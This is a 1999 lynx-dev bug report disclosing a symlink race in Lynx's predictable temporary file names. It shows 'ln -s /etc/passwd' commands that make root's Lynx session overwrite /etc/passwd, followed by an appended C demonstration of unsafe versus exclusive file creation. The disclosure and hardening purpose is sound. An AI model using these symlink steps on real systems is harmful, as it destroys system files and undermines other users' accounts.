lynx-dev Bug in lynx...
From: Juan Diego
Subject: lynx-dev Bug in lynx...
Date: Mon, 8 Feb 1999 22:58:43 +0500 (GMT)
Hello....
I have found a bug in all versions of Lynx...
Lynx creates temporary files in /tmp in this way....
L[num proc]-xTMP.html
where
[num proc] is the process number on the machine
x is a number from 0 to 9
If I run lynx as any user, for example root, we see this
earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps
then the files in /tmp created by lynx will be..
L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html
If I make a symlink
from any of them to any file in the system, for example....
earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html
and now when root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file I have linked (in this
case /etc/passwd) will be replaced with it...
For example, I got this on my system
earthworm:/tmp$ cat /etc/passwd
<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently
Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>
As you can see, the file is lost now...
I hope this can help you to improve lynx.
I'll post this tomorrow to the bugtraq list, but first the developers...
Keep up that great work with lynx, I really like it....
by..
Juan Diego
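
An added C illustration, not part of the original message and not Lynx source code: it contrasts a generic open-and-truncate call, which is consistent with the overwrite reported above, with exclusive creation that refuses a name someone else has already placed. The scratch directory, file names and contents are constructed for the demonstration, and everything happens inside a private directory made with mkdtemp.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Unsafe pattern: follows a pre-existing symlink and truncates its target. */
static int open_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_EXCL fails with EEXIST if anything, including a symlink,
 * already exists at the name; O_NOFOLLOW is a second guard. */
static int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Place a symlink at a PID-derived name in a private scratch directory
 * (constructed test data), open that name with the chosen routine, and
 * report the link target: 1 = intact, 0 = overwritten, -1 = setup error. */
int victim_survives(int hardened) {
    static const char page[] = "<title>Lynx History Page</title>\n";
    char dir[] = "/tmp/symlink-demo-XXXXXX";
    char victim[128], tmp[128], buf[16] = {0};
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(tmp, sizeof tmp, "%s/L%ld-0TMP.html", dir, (long)getpid());
    FILE *f = fopen(victim, "w");
    if (f == NULL) return -1;
    fputs("important", f);
    fclose(f);
    if (symlink(victim, tmp) != 0) return -1;

    int fd = hardened ? open_exclusive(tmp) : open_unsafe(tmp);
    if (fd >= 0) {                      /* only reached when the open succeeded */
        ssize_t n = write(fd, page, sizeof page - 1); (void)n;
        close(fd);
    }
    f = fopen(victim, "r");
    if (f != NULL) { size_t n = fread(buf, 1, sizeof buf - 1, f); buf[n] = '\0'; fclose(f); }
    unlink(tmp); unlink(victim); rmdir(dir);
    return strcmp(buf, "important") == 0;
}

int main(void) {
    printf("unsafe: intact=%d  exclusive: intact=%d\n", victim_survives(0), victim_survives(1));
    return 0;
}
```

Exclusive creation only turns the overwrite into a failed open; using mkstemp() to get an unpredictable name, or keeping temporary files in a per-user directory, also removes the ability to pre-place the name.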